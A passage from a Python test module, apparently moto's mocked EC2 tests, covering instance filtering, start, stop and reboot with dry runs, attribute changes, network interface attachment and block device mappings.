filters={"state-reason-code": "Client.UserInitiatedShutdown"}
)
# get_all_reservations should return instance1 and instance2
reservations[0].instances.should.have.length_of(2)
set([instance1.id, instance2.id]).should.equal(
set([i.id for i in reservations[0].instances])
)
reservations = conn.get_all_reservations(filters={"state-reason-code": ""})
# get_all_reservations should return instance 3
reservations[0].instances.should.have.length_of(1)
reservations[0].instances[0].id.should.equal(instance3.id)
@mock_ec2_deprecated
def test_get_instances_filtering_by_source_dest_check():
conn = boto.connect_ec2()
reservation = conn.run_instances(EXAMPLE_AMI_ID, min_count=2)
instance1, instance2 = reservation.instances
conn.modify_instance_attribute(
instance1.id, attribute="sourceDestCheck", value=False
)
source_dest_check_false = conn.get_all_reservations(
filters={"source-dest-check": "false"}
)
source_dest_check_true = conn.get_all_reservations(
filters={"source-dest-check": "true"}
)
source_dest_check_false[0].instances.should.have.length_of(1)
source_dest_check_false[0].instances[0].id.should.equal(instance1.id)
source_dest_check_true[0].instances.should.have.length_of(1)
source_dest_check_true[0].instances[0].id.should.equal(instance2.id)
@mock_ec2_deprecated
def test_get_instances_filtering_by_vpc_id():
conn = boto.connect_vpc("the_key", "the_secret")
vpc1 = conn.create_vpc("10.0.0.0/16")
subnet1 = conn.create_subnet(vpc1.id, "10.0.0.0/27")
reservation1 = conn.run_instances(EXAMPLE_AMI_ID, min_count=1, subnet_id=subnet1.id)
instance1 = reservation1.instances[0]
vpc2 = conn.create_vpc("10.1.0.0/16")
subnet2 = conn.create_subnet(vpc2.id, "10.1.0.0/27")
reservation2 = conn.run_instances(EXAMPLE_AMI_ID, min_count=1, subnet_id=subnet2.id)
instance2 = reservation2.instances[0]
reservations1 = conn.get_all_reservations(filters={"vpc-id": vpc1.id})
reservations1.should.have.length_of(1)
reservations1[0].instances.should.have.length_of(1)
reservations1[0].instances[0].id.should.equal(instance1.id)
reservations1[0].instances[0].vpc_id.should.equal(vpc1.id)
reservations1[0].instances[0].subnet_id.should.equal(subnet1.id)
reservations2 = conn.get_all_reservations(filters={"vpc-id": vpc2.id})
reservations2.should.have.length_of(1)
reservations2[0].instances.should.have.length_of(1)
reservations2[0].instances[0].id.should.equal(instance2.id)
reservations2[0].instances[0].vpc_id.should.equal(vpc2.id)
reservations2[0].instances[0].subnet_id.should.equal(subnet2.id)
@mock_ec2_deprecated
def test_get_instances_filtering_by_architecture():
conn = boto.connect_ec2()
reservation = conn.run_instances(EXAMPLE_AMI_ID, min_count=1)
instance = reservation.instances
reservations = conn.get_all_reservations(filters={"architecture": "x86_64"})
# get_all_reservations should return the instance
reservations[0].instances.should.have.length_of(1)
@mock_ec2
def test_get_instances_filtering_by_image_id():
client = boto3.client("ec2", region_name="us-east-1")
conn = boto3.resource("ec2", "us-east-1")
conn.create_instances(ImageId=EXAMPLE_AMI_ID, MinCount=1, MaxCount=1)
reservations = client.describe_instances(
Filters=[{"Name": "image-id", "Values": [EXAMPLE_AMI_ID]}]
)["Reservations"]
reservations[0]["Instances"].should.have.length_of(1)
@mock_ec2
def test_get_instances_filtering_by_account_id():
client = boto3.client("ec2", region_name="us-east-1")
conn = boto3.resource("ec2", "us-east-1")
conn.create_instances(ImageId=EXAMPLE_AMI_ID, MinCount=1, MaxCount=1)
reservations = client.describe_instances(
Filters=[{"Name": "owner-id", "Values": ["123456789012"]}]
)["Reservations"]
reservations[0]["Instances"].should.have.length_of(1)
@mock_ec2
def test_get_instances_filtering_by_private_dns():
client = boto3.client("ec2", region_name="us-east-1")
conn = boto3.resource("ec2", "us-east-1")
conn.create_instances(
        # private IP aligned with the ip-10-0-0-1 DNS-name filter below
        ImageId=EXAMPLE_AMI_ID, MinCount=1, MaxCount=1, PrivateIpAddress="10.0.0.1"
)
reservations = client.describe_instances(
Filters=[{"Name": "private-dns-name", "Values": ["ip-10-0-0-1.ec2.internal"]}]
)["Reservations"]
reservations[0]["Instances"].should.have.length_of(1)
@mock_ec2
def test_get_instances_filtering_by_ni_private_dns():
client = boto3.client("ec2", region_name="us-west-2")
conn = boto3.resource("ec2", "us-west-2")
conn.create_instances(
        # private IP aligned with the ip-10-0-0-1 DNS-name filter below
        ImageId=EXAMPLE_AMI_ID, MinCount=1, MaxCount=1, PrivateIpAddress="10.0.0.1"
)
reservations = client.describe_instances(
Filters=[
{
"Name": "network-interface.private-dns-name",
"Values": ["ip-10-0-0-1.us-west-2.compute.internal"],
}
]
)["Reservations"]
reservations[0]["Instances"].should.have.length_of(1)
@mock_ec2
def test_get_instances_filtering_by_instance_group_name():
client = boto3.client("ec2", region_name="us-east-1")
client.create_security_group(Description="test", GroupName="test_sg")
client.run_instances(
ImageId=EXAMPLE_AMI_ID, MinCount=1, MaxCount=1, SecurityGroups=["test_sg"]
)
reservations = client.describe_instances(
Filters=[{"Name": "instance.group-name", "Values": ["test_sg"]}]
)["Reservations"]
reservations[0]["Instances"].should.have.length_of(1)
@mock_ec2
def test_get_instances_filtering_by_instance_group_id():
client = boto3.client("ec2", region_name="us-east-1")
create_sg = client.create_security_group(Description="test", GroupName="test_sg")
group_id = create_sg["GroupId"]
client.run_instances(
ImageId=EXAMPLE_AMI_ID, MinCount=1, MaxCount=1, SecurityGroups=["test_sg"]
)
reservations = client.describe_instances(
Filters=[{"Name": "instance.group-id", "Values": [group_id]}]
)["Reservations"]
reservations[0]["Instances"].should.have.length_of(1)
@mock_ec2
def test_get_instances_filtering_by_subnet_id():
client = boto3.client("ec2", region_name="us-east-1")
vpc_cidr = ipaddress.ip_network("192.168.42.0/24")
subnet_cidr = ipaddress.ip_network("192.168.42.0/25")
resp = client.create_vpc(CidrBlock=str(vpc_cidr),)
vpc_id = resp["Vpc"]["VpcId"]
resp = client.create_subnet(CidrBlock=str(subnet_cidr), VpcId=vpc_id)
subnet_id = resp["Subnet"]["SubnetId"]
client.run_instances(
ImageId=EXAMPLE_AMI_ID, MaxCount=1, MinCount=1, SubnetId=subnet_id,
)
reservations = client.describe_instances(
Filters=[{"Name": "subnet-id", "Values": [subnet_id]}]
)["Reservations"]
reservations.should.have.length_of(1)
@mock_ec2_deprecated
def test_get_instances_filtering_by_tag():
conn = boto.connect_ec2()
reservation = conn.run_instances(EXAMPLE_AMI_ID, min_count=3)
instance1, instance2, instance3 = reservation.instances
instance1.add_tag("tag1", "value1")
instance1.add_tag("tag2", "value2")
instance2.add_tag("tag1", "value1")
instance2.add_tag("tag2", "wrong value")
instance3.add_tag("tag2", "value2")
reservations = conn.get_all_reservations(filters={"tag:tag0": "value0"})
# get_all_reservations should return no instances
reservations.should.have.length_of(0)
reservations = conn.get_all_reservations(filters={"tag:tag1": "value1"})
# get_all_reservations should return both instances with this tag value
reservations.should.have.length_of(1)
reservations[0].instances.should.have.length_of(2)
reservations[0].instances[0].id.should.equal(instance1.id)
reservations[0].instances[1].id.should.equal(instance2.id)
reservations = conn.get_all_reservations(
filters={"tag:tag1": "value1", "tag:tag2": "value2"}
)
# get_all_reservations should return the instance with both tag values
reservations.should.have.length_of(1)
reservations[0].instances.should.have.length_of(1)
reservations[0].instances[0].id.should.equal(instance1.id)
reservations = conn.get_all_reservations(
filters={"tag:tag1": "value1", "tag:tag2": "value2"}
)
# get_all_reservations should return the instance with both tag values
reservations.should.have.length_of(1)
reservations[0].instances.should.have.length_of(1)
reservations[0].instances[0].id.should.equal(instance1.id)
reservations = conn.get_all_reservations(filters={"tag:tag2": ["value2", "bogus"]})
# get_all_reservations should return both instances with one of the
# acceptable tag values
reservations.should.have.length_of(1)
reservations[0].instances.should.have.length_of(2)
reservations[0].instances[0].id.should.equal(instance1.id)
reservations[0].instances[1].id.should.equal(instance3.id)
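# Hedged sketch, not part of the original suite: the same tag filtering
# expressed through the boto3 client API. The function name and the tag
# key/value are hypothetical; create_tags/describe_instances are standard
# EC2 client calls.
@mock_ec2
def test_get_instances_filtering_by_tag_boto3_sketch():
    client = boto3.client("ec2", region_name="us-east-1")
    instance_id = client.run_instances(
        ImageId=EXAMPLE_AMI_ID, MinCount=1, MaxCount=1
    )["Instances"][0]["InstanceId"]
    # Tag the instance, then filter on the exact key/value pair.
    client.create_tags(
        Resources=[instance_id], Tags=[{"Key": "tag1", "Value": "value1"}]
    )
    reservations = client.describe_instances(
        Filters=[{"Name": "tag:tag1", "Values": ["value1"]}]
    )["Reservations"]
    reservations[0]["Instances"].should.have.length_of(1)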
@mock_ec2_deprecated
def test_get_instances_filtering_by_tag_value():
conn = boto.connect_ec2()
reservation = conn.run_instances(EXAMPLE_AMI_ID, min_count=3)
instance1, instance2, instance3 = reservation.instances
instance1.add_tag("tag1", "value1")
instance1.add_tag("tag2", "value2")
instance2.add_tag("tag1", "value1")
instance2.add_tag("tag2", "wrong value")
instance3.add_tag("tag2", "value2")
reservations = conn.get_all_reservations(filters={"tag-value": "value0"})
# get_all_reservations should return no instances
reservations.should.have.length_of(0)
reservations = conn.get_all_reservations(filters={"tag-value": "value1"})
# get_all_reservations should return both instances with this tag value
reservations.should.have.length_of(1)
reservations[0].instances.should.have.length_of(2)
reservations[0].instances[0].id.should.equal(instance1.id)
reservations[0].instances[1].id.should.equal(instance2.id)
reservations = conn.get_all_reservations(
filters={"tag-value": ["value2", "value1"]}
)
# get_all_reservations should return both instances with one of the
# acceptable tag values
reservations.should.have.length_of(1)
reservations[0].instances.should.have.length_of(3)
reservations[0].instances[0].id.should.equal(instance1.id)
reservations[0].instances[1].id.should.equal(instance2.id)
reservations[0].instances[2].id.should.equal(instance3.id)
reservations = conn.get_all_reservations(filters={"tag-value": ["value2", "bogus"]})
# get_all_reservations should return both instances with one of the
# acceptable tag values
reservations.should.have.length_of(1)
reservations[0].instances.should.have.length_of(2)
reservations[0].instances[0].id.should.equal(instance1.id)
reservations[0].instances[1].id.should.equal(instance3.id)
@mock_ec2_deprecated
def test_get_instances_filtering_by_tag_name():
conn = boto.connect_ec2()
reservation = conn.run_instances(EXAMPLE_AMI_ID, min_count=3)
instance1, instance2, instance3 = reservation.instances
instance1.add_tag("tag1")
instance1.add_tag("tag2")
instance2.add_tag("tag1")
instance2.add_tag("tag2X")
instance3.add_tag("tag3")
reservations = conn.get_all_reservations(filters={"tag-key": "tagX"})
# get_all_reservations should return no instances
reservations.should.have.length_of(0)
reservations = conn.get_all_reservations(filters={"tag-key": "tag1"})
# get_all_reservations should return both instances with this tag value
reservations.should.have.length_of(1)
reservations[0].instances.should.have.length_of(2)
reservations[0].instances[0].id.should.equal(instance1.id)
reservations[0].instances[1].id.should.equal(instance2.id)
reservations = conn.get_all_reservations(filters={"tag-key": ["tag1", "tag3"]})
# get_all_reservations should return both instances with one of the
# acceptable tag values
reservations.should.have.length_of(1)
reservations[0].instances.should.have.length_of(3)
reservations[0].instances[0].id.should.equal(instance1.id)
reservations[0].instances[1].id.should.equal(instance2.id)
reservations[0].instances[2].id.should.equal(instance3.id)
@mock_ec2_deprecated
def test_instance_start_and_stop():
conn = boto.connect_ec2("the_key", "the_secret")
reservation = conn.run_instances(EXAMPLE_AMI_ID, min_count=2)
instances = reservation.instances
instances.should.have.length_of(2)
instance_ids = [instance.id for instance in instances]
with pytest.raises(EC2ResponseError) as ex:
stopped_instances = conn.stop_instances(instance_ids, dry_run=True)
ex.value.error_code.should.equal("DryRunOperation")
ex.value.status.should.equal(400)
ex.value.message.should.equal(
"An error occurred (DryRunOperation) when calling the StopInstance operation: Request would have succeeded, but DryRun flag is set"
)
stopped_instances = conn.stop_instances(instance_ids)
for instance in stopped_instances:
instance.state.should.equal("stopping")
with pytest.raises(EC2ResponseError) as ex:
started_instances = conn.start_instances([instances[0].id], dry_run=True)
ex.value.error_code.should.equal("DryRunOperation")
ex.value.status.should.equal(400)
ex.value.message.should.equal(
"An error occurred (DryRunOperation) when calling the StartInstance operation: Request would have succeeded, but DryRun flag is set"
)
started_instances = conn.start_instances([instances[0].id])
started_instances[0].state.should.equal("pending")
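# The dry_run pattern above recurs throughout this module: when a request
# would have succeeded, boto raises EC2ResponseError with error_code
# "DryRunOperation" and status 400, so each mutating call is first issued
# with dry_run=True and the error fields asserted before the real call.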
@mock_ec2_deprecated
def test_instance_reboot():
conn = boto.connect_ec2("the_key", "the_secret")
reservation = conn.run_instances(EXAMPLE_AMI_ID)
instance = reservation.instances[0]
with pytest.raises(EC2ResponseError) as ex:
instance.reboot(dry_run=True)
ex.value.error_code.should.equal("DryRunOperation")
ex.value.status.should.equal(400)
ex.value.message.should.equal(
"An error occurred (DryRunOperation) when calling the RebootInstance operation: Request would have succeeded, but DryRun flag is set"
)
instance.reboot()
instance.state.should.equal("pending")
@mock_ec2_deprecated
def test_instance_attribute_instance_type():
conn = boto.connect_ec2("the_key", "the_secret")
reservation = conn.run_instances(EXAMPLE_AMI_ID)
instance = reservation.instances[0]
with pytest.raises(EC2ResponseError) as ex:
instance.modify_attribute("instanceType", "m1.small", dry_run=True)
ex.value.error_code.should.equal("DryRunOperation")
ex.value.status.should.equal(400)
ex.value.message.should.equal(
"An error occurred (DryRunOperation) when calling the ModifyInstanceType operation: Request would have succeeded, but DryRun flag is set"
)
instance.modify_attribute("instanceType", "m1.small")
instance_attribute = instance.get_attribute("instanceType")
instance_attribute.should.be.a(InstanceAttribute)
instance_attribute.get("instanceType").should.equal("m1.small")
@mock_ec2_deprecated
def test_modify_instance_attribute_security_groups():
conn = boto.connect_ec2("the_key", "the_secret")
reservation = conn.run_instances(EXAMPLE_AMI_ID)
instance = reservation.instances[0]
sg_id = conn.create_security_group(
"test security group", "this is a test security group"
).id
sg_id2 = conn.create_security_group(
"test security group 2", "this is a test security group 2"
).id
with pytest.raises(EC2ResponseError) as ex:
instance.modify_attribute("groupSet", [sg_id, sg_id2], dry_run=True)
ex.value.error_code.should.equal("DryRunOperation")
ex.value.status.should.equal(400)
ex.value.message.should.equal(
"An error occurred (DryRunOperation) when calling the ModifyInstanceSecurityGroups operation: Request would have succeeded, but DryRun flag is set"
)
instance.modify_attribute("groupSet", [sg_id, sg_id2])
instance_attribute = instance.get_attribute("groupSet")
instance_attribute.should.be.a(InstanceAttribute)
group_list = instance_attribute.get("groupSet")
any(g.id == sg_id for g in group_list).should.be.ok
any(g.id == sg_id2 for g in group_list).should.be.ok
@mock_ec2_deprecated
def test_instance_attribute_user_data():
conn = boto.connect_ec2("the_key", "the_secret")
reservation = conn.run_instances(EXAMPLE_AMI_ID)
instance = reservation.instances[0]
with pytest.raises(EC2ResponseError) as ex:
instance.modify_attribute("userData", "this is my user data", dry_run=True)
ex.value.error_code.should.equal("DryRunOperation")
ex.value.status.should.equal(400)
ex.value.message.should.equal(
"An error occurred (DryRunOperation) when calling the ModifyUserData operation: Request would have succeeded, but DryRun flag is set"
)
instance.modify_attribute("userData", "this is my user data")
instance_attribute = instance.get_attribute("userData")
instance_attribute.should.be.a(InstanceAttribute)
instance_attribute.get("userData").should.equal("this is my user data")
@mock_ec2_deprecated
def test_instance_attribute_source_dest_check():
conn = boto.connect_ec2("the_key", "the_secret")
reservation = conn.run_instances(EXAMPLE_AMI_ID)
instance = reservation.instances[0]
# Default value is true
instance.sourceDestCheck.should.equal("true")
instance_attribute = instance.get_attribute("sourceDestCheck")
instance_attribute.should.be.a(InstanceAttribute)
instance_attribute.get("sourceDestCheck").should.equal(True)
# Set to false (note: Boto converts bool to string, eg 'false')
with pytest.raises(EC2ResponseError) as ex:
instance.modify_attribute("sourceDestCheck", False, dry_run=True)
ex.value.error_code.should.equal("DryRunOperation")
ex.value.status.should.equal(400)
ex.value.message.should.equal(
"An error occurred (DryRunOperation) when calling the ModifySourceDestCheck operation: Request would have succeeded, but DryRun flag is set"
)
instance.modify_attribute("sourceDestCheck", False)
instance.update()
instance.sourceDestCheck.should.equal("false")
instance_attribute = instance.get_attribute("sourceDestCheck")
instance_attribute.should.be.a(InstanceAttribute)
instance_attribute.get("sourceDestCheck").should.equal(False)
# Set back to true
instance.modify_attribute("sourceDestCheck", True)
instance.update()
instance.sourceDestCheck.should.equal("true")
instance_attribute = instance.get_attribute("sourceDestCheck")
instance_attribute.should.be.a(InstanceAttribute)
instance_attribute.get("sourceDestCheck").should.equal(True)
@mock_ec2_deprecated
def test_user_data_with_run_instance():
user_data = b"some user data"
conn = boto.connect_ec2("the_key", "the_secret")
reservation = conn.run_instances(EXAMPLE_AMI_ID, user_data=user_data)
instance = reservation.instances[0]
instance_attribute = instance.get_attribute("userData")
instance_attribute.should.be.a(InstanceAttribute)
retrieved_user_data = instance_attribute.get("userData").encode("utf-8")
decoded_user_data = decode_method(retrieved_user_data)
decoded_user_data.should.equal(b"some user data")
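# decode_method is chosen earlier in this module (presumably
# base64.decodebytes on Python 3 vs. base64.decodestring on Python 2);
# DescribeInstanceAttribute returns userData base64-encoded, so decoding
# round-trips it back to the raw bytes passed to run_instances.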
@mock_ec2_deprecated
def test_run_instance_with_security_group_name():
conn = boto.connect_ec2("the_key", "the_secret")
with pytest.raises(EC2ResponseError) as ex:
group = conn.create_security_group("group1", "some description", dry_run=True)
ex.value.error_code.should.equal("DryRunOperation")
ex.value.status.should.equal(400)
ex.value.message.should.equal(
"An error occurred (DryRunOperation) when calling the CreateSecurityGroup operation: Request would have succeeded, but DryRun flag is set"
)
group = conn.create_security_group("group1", "some description")
reservation = conn.run_instances(EXAMPLE_AMI_ID, security_groups=["group1"])
instance = reservation.instances[0]
instance.groups[0].id.should.equal(group.id)
instance.groups[0].name.should.equal("group1")
@mock_ec2_deprecated
def test_run_instance_with_security_group_id():
conn = boto.connect_ec2("the_key", "the_secret")
group = conn.create_security_group("group1", "some description")
reservation = conn.run_instances(EXAMPLE_AMI_ID, security_group_ids=[group.id])
instance = reservation.instances[0]
instance.groups[0].id.should.equal(group.id)
instance.groups[0].name.should.equal("group1")
@mock_ec2_deprecated
def test_run_instance_with_instance_type():
conn = boto.connect_ec2("the_key", "the_secret")
reservation = conn.run_instances(EXAMPLE_AMI_ID, instance_type="t1.micro")
instance = reservation.instances[0]
instance.instance_type.should.equal("t1.micro")
@mock_ec2_deprecated
def test_run_instance_with_default_placement():
conn = boto.ec2.connect_to_region("us-east-1")
reservation = conn.run_instances(EXAMPLE_AMI_ID)
instance = reservation.instances[0]
instance.placement.should.equal("us-east-1a")
@mock_ec2_deprecated
def test_run_instance_with_placement():
conn = boto.connect_ec2("the_key", "the_secret")
reservation = conn.run_instances(EXAMPLE_AMI_ID, placement="us-east-1b")
instance = reservation.instances[0]
instance.placement.should.equal("us-east-1b")
@mock_ec2
def test_run_instance_with_subnet_boto3():
client = boto3.client("ec2", region_name="eu-central-1")
ip_networks = [
(ipaddress.ip_network("10.0.0.0/16"), ipaddress.ip_network("10.0.99.0/24")),
(
ipaddress.ip_network("192.168.42.0/24"),
ipaddress.ip_network("192.168.42.0/25"),
),
]
# Tests instances are created with the correct IPs
for vpc_cidr, subnet_cidr in ip_networks:
resp = client.create_vpc(
CidrBlock=str(vpc_cidr),
AmazonProvidedIpv6CidrBlock=False,
DryRun=False,
InstanceTenancy="default",
)
vpc_id = resp["Vpc"]["VpcId"]
resp = client.create_subnet(CidrBlock=str(subnet_cidr), VpcId=vpc_id)
subnet_id = resp["Subnet"]["SubnetId"]
resp = client.run_instances(
ImageId=EXAMPLE_AMI_ID, MaxCount=1, MinCount=1, SubnetId=subnet_id
)
instance = resp["Instances"][0]
instance["SubnetId"].should.equal(subnet_id)
priv_ipv4 = ipaddress.ip_address(six.text_type(instance["PrivateIpAddress"]))
subnet_cidr.should.contain(priv_ipv4)
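# Note on the test above: moto assigns each instance a free address from the
# requested subnet, so the assertion checks CIDR membership rather than a
# fixed IP.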
@mock_ec2
def test_run_instance_with_specified_private_ipv4():
client = boto3.client("ec2", region_name="eu-central-1")
vpc_cidr = ipaddress.ip_network("192.168.42.0/24")
subnet_cidr = ipaddress.ip_network("192.168.42.0/25")
resp = client.create_vpc(
CidrBlock=str(vpc_cidr),
AmazonProvidedIpv6CidrBlock=False,
DryRun=False,
InstanceTenancy="default",
)
vpc_id = resp["Vpc"]["VpcId"]
resp = client.create_subnet(CidrBlock=str(subnet_cidr), VpcId=vpc_id)
subnet_id = resp["Subnet"]["SubnetId"]
resp = client.run_instances(
ImageId=EXAMPLE_AMI_ID,
MaxCount=1,
MinCount=1,
SubnetId=subnet_id,
PrivateIpAddress="127.0.0.1",
)
instance = resp["Instances"][0]
instance["SubnetId"].should.equal(subnet_id)
instance["PrivateIpAddress"].should.equal("127.0.0.1")
@mock_ec2
def test_run_instance_mapped_public_ipv4():
client = boto3.client("ec2", region_name="eu-central-1")
vpc_cidr = ipaddress.ip_network("192.168.42.0/24")
subnet_cidr = ipaddress.ip_network("192.168.42.0/25")
resp = client.create_vpc(
CidrBlock=str(vpc_cidr),
AmazonProvidedIpv6CidrBlock=False,
DryRun=False,
InstanceTenancy="default",
)
vpc_id = resp["Vpc"]["VpcId"]
resp = client.create_subnet(CidrBlock=str(subnet_cidr), VpcId=vpc_id)
subnet_id = resp["Subnet"]["SubnetId"]
client.modify_subnet_attribute(
SubnetId=subnet_id, MapPublicIpOnLaunch={"Value": True}
)
resp = client.run_instances(
ImageId=EXAMPLE_AMI_ID, MaxCount=1, MinCount=1, SubnetId=subnet_id
)
instance = resp["Instances"][0]
instance.should.contain("PublicDnsName")
instance.should.contain("PublicIpAddress")
len(instance["PublicDnsName"]).should.be.greater_than(0)
len(instance["PublicIpAddress"]).should.be.greater_than(0)
@mock_ec2_deprecated
def test_run_instance_with_nic_autocreated():
conn = boto.connect_vpc("the_key", "the_secret")
vpc = conn.create_vpc("10.0.0.0/16")
subnet = conn.create_subnet(vpc.id, "10.0.0.0/18")
security_group1 = conn.create_security_group(
"test security group #1", "this is a test security group"
)
security_group2 = conn.create_security_group(
"test security group #2", "this is a test security group"
)
private_ip = "127.0.0.1"
reservation = conn.run_instances(
EXAMPLE_AMI_ID,
subnet_id=subnet.id,
security_groups=[security_group1.name],
security_group_ids=[security_group2.id],
private_ip_address=private_ip,
)
instance = reservation.instances[0]
all_enis = conn.get_all_network_interfaces()
all_enis.should.have.length_of(1)
eni = all_enis[0]
instance.interfaces.should.have.length_of(1)
instance.interfaces[0].id.should.equal(eni.id)
instance.subnet_id.should.equal(subnet.id)
instance.groups.should.have.length_of(2)
set([group.id for group in instance.groups]).should.equal(
set([security_group1.id, security_group2.id])
)
eni.subnet_id.should.equal(subnet.id)
eni.groups.should.have.length_of(2)
set([group.id for group in eni.groups]).should.equal(
set([security_group1.id, security_group2.id])
)
eni.private_ip_addresses.should.have.length_of(1)
eni.private_ip_addresses[0].private_ip_address.should.equal(private_ip)
@mock_ec2_deprecated
def test_run_instance_with_nic_preexisting():
conn = boto.connect_vpc("the_key", "the_secret")
vpc = conn.create_vpc("10.0.0.0/16")
subnet = conn.create_subnet(vpc.id, "10.0.0.0/18")
security_group1 = conn.create_security_group(
"test security group #1", "this is a test security group"
)
security_group2 = conn.create_security_group(
"test security group #2", "this is a test security group"
)
private_ip = "127.0.0.1"
eni = conn.create_network_interface(
subnet.id, private_ip, groups=[security_group1.id]
)
# Boto requires NetworkInterfaceCollection of NetworkInterfaceSpecifications...
# annoying, but generates the desired querystring.
from boto.ec2.networkinterface import (
NetworkInterfaceSpecification,
NetworkInterfaceCollection,
)
interface = NetworkInterfaceSpecification(
network_interface_id=eni.id, device_index=0
)
interfaces = NetworkInterfaceCollection(interface)
# end Boto objects
reservation = conn.run_instances(
EXAMPLE_AMI_ID,
network_interfaces=interfaces,
security_group_ids=[security_group2.id],
)
instance = reservation.instances[0]
instance.subnet_id.should.equal(subnet.id)
all_enis = conn.get_all_network_interfaces()
all_enis.should.have.length_of(1)
instance.interfaces.should.have.length_of(1)
instance_eni = instance.interfaces[0]
instance_eni.id.should.equal(eni.id)
instance_eni.subnet_id.should.equal(subnet.id)
instance_eni.groups.should.have.length_of(2)
set([group.id for group in instance_eni.groups]).should.equal(
set([security_group1.id, security_group2.id])
)
instance_eni.private_ip_addresses.should.have.length_of(1)
instance_eni.private_ip_addresses[0].private_ip_address.should.equal(private_ip)
@requires_boto_gte("2.32.0")
@mock_ec2_deprecated
def test_instance_with_nic_attach_detach():
conn = boto.connect_vpc("the_key", "the_secret")
vpc = conn.create_vpc("10.0.0.0/16")
subnet = conn.create_subnet(vpc.id, "10.0.0.0/18")
security_group1 = conn.create_security_group(
"test security group #1", "this is a test security group"
)
security_group2 = conn.create_security_group(
"test security group #2", "this is a test security group"
)
reservation = conn.run_instances(
EXAMPLE_AMI_ID, security_group_ids=[security_group1.id]
)
instance = reservation.instances[0]
eni = conn.create_network_interface(subnet.id, groups=[security_group2.id])
# Check initial instance and ENI data
instance.interfaces.should.have.length_of(1)
eni.groups.should.have.length_of(1)
set([group.id for group in eni.groups]).should.equal(set([security_group2.id]))
# Attach
with pytest.raises(EC2ResponseError) as ex:
conn.attach_network_interface(eni.id, instance.id, device_index=1, dry_run=True)
ex.value.error_code.should.equal("DryRunOperation")
ex.value.status.should.equal(400)
ex.value.message.should.equal(
"An error occurred (DryRunOperation) when calling the AttachNetworkInterface operation: Request would have succeeded, but DryRun flag is set"
)
conn.attach_network_interface(eni.id, instance.id, device_index=1)
# Check attached instance and ENI data
instance.update()
instance.interfaces.should.have.length_of(2)
instance_eni = instance.interfaces[1]
instance_eni.id.should.equal(eni.id)
instance_eni.groups.should.have.length_of(2)
set([group.id for group in instance_eni.groups]).should.equal(
set([security_group1.id, security_group2.id])
)
eni = conn.get_all_network_interfaces(filters={"network-interface-id": eni.id})[0]
eni.groups.should.have.length_of(2)
set([group.id for group in eni.groups]).should.equal(
set([security_group1.id, security_group2.id])
)
# Detach
with pytest.raises(EC2ResponseError) as ex:
conn.detach_network_interface(instance_eni.attachment.id, dry_run=True)
ex.value.error_code.should.equal("DryRunOperation")
ex.value.status.should.equal(400)
ex.value.message.should.equal(
"An error occurred (DryRunOperation) when calling the DetachNetworkInterface operation: Request would have succeeded, but DryRun flag is set"
)
conn.detach_network_interface(instance_eni.attachment.id)
# Check detached instance and ENI data
instance.update()
instance.interfaces.should.have.length_of(1)
eni = conn.get_all_network_interfaces(filters={"network-interface-id": eni.id})[0]
eni.groups.should.have.length_of(1)
set([group.id for group in eni.groups]).should.equal(set([security_group2.id]))
# Detach with invalid attachment ID
with pytest.raises(EC2ResponseError) as cm:
conn.detach_network_interface("eni-attach-1234abcd")
cm.value.code.should.equal("InvalidAttachmentID.NotFound")
cm.value.status.should.equal(400)
cm.value.request_id.should_not.be.none
@mock_ec2_deprecated
def test_ec2_classic_has_public_ip_address():
conn = boto.connect_ec2("the_key", "the_secret")
reservation = conn.run_instances(EXAMPLE_AMI_ID, key_name="keypair_name")
instance = reservation.instances[0]
instance.ip_address.should_not.equal(None)
instance.public_dns_name.should.contain(instance.ip_address.replace(".", "-"))
instance.private_ip_address.should_not.equal(None)
instance.private_dns_name.should.contain(
instance.private_ip_address.replace(".", "-")
)
@mock_ec2_deprecated
def test_run_instance_with_keypair():
conn = boto.connect_ec2("the_key", "the_secret")
reservation = conn.run_instances(EXAMPLE_AMI_ID, key_name="keypair_name")
instance = reservation.instances[0]
instance.key_name.should.equal("keypair_name")
@mock_ec2
def test_run_instance_with_block_device_mappings():
ec2_client = boto3.client("ec2", region_name="us-east-1")
kwargs = {
"MinCount": 1,
"MaxCount": 1,
"ImageId": EXAMPLE_AMI_ID,
"KeyName": "the_key",
"InstanceType": "t1.micro",
"BlockDeviceMappings": [{"DeviceName": "/dev/sda2", "Ebs": {"VolumeSize": 50}}],
}
ec2_client.run_instances(**kwargs)
instances = ec2_client.describe_instances()
volume = instances["Reservations"][0]["Instances"][0]["BlockDeviceMappings"][0][
"Ebs"
]
volumes = ec2_client.describe_volumes(VolumeIds=[volume["VolumeId"]])
volumes["Volumes"][0]["Size"].should.equal(50)
@mock_ec2
def test_run_instance_with_block_device_mappings_missing_ebs():
ec2_client = boto3.client("ec2", region_name="us-east-1")
kwargs = {
"MinCount": 1,
"MaxCount": 1,
"ImageId": EXAMPLE_AMI_ID,
"KeyName": "the_key",
"InstanceType": "t1.micro",
"BlockDeviceMappings": [{"DeviceName": "/dev/sda2"}],
}
with pytest.raises(ClientError) as ex:
ec2_client.run_instances(**kwargs)
ex.value.response["Error"]["Code"].should.equal("MissingParameter")
ex.value.response["ResponseMetadata"]["HTTPStatusCode"].should.equal(400)
ex.value.response["Error"]["Message"].should.equal(
"The request must contain the parameter ebs"
)
@mock_ec2
def test_run_instance_with_block_device_mappings_missing_size():
ec2_client = boto3.client("ec2", region_name="us-east-1")
kwargs = {
"MinCount": 1,
"MaxCount": 1,
"ImageId": EXAMPLE_AMI_ID,
"KeyName": "the_key",
"InstanceType": "t1.micro",
"BlockDeviceMappings": [
{"DeviceName": "/dev/sda2", "Ebs": {"VolumeType": "standard"}}
],
}
with pytest.raises(ClientError) as ex:
ec2_client.run_instances(**kwargs)
ex.value.response["Error"]["Code"].should.equal("MissingParameter")
ex.value.response["ResponseMetadata"]["HTTPStatusCode"].should.equal(400)
ex.value.response["Error"]["Message"].should.equal(
"The request must contain the parameter size or snapshotId"
)
@mock_ec2
def test_run_instance_with_block_device_mappings_from_snapshot():
ec2_client = boto3.client("ec2", region_name="us-east-1")
ec2_resource = boto3.resource("ec2", region_name="us-east-1")
volume_details = {
"AvailabilityZone": "1a",
"Size": 30,
}
volume = ec2_resource.create_volume(**volume_details)
snapshot = volume.create_snapshot()
kwargs = {
"MinCount": 1,
"MaxCount": 1,
"ImageId": EXAMPLE_AMI_ID,
"KeyName": "the_key",
"InstanceType": "t1.micro",
"BlockDeviceMappings": [
{"DeviceName": "/dev/sda2", "Ebs": {"SnapshotId": snapshot.snapshot_id}}
],
}
ec2_client.run_instances(**kwargs)
instances = ec2_client.describe_instances()
volume = instances["Reservations"][0]["Instances"][0]["BlockDeviceMappings"][0][
"Ebs"
]
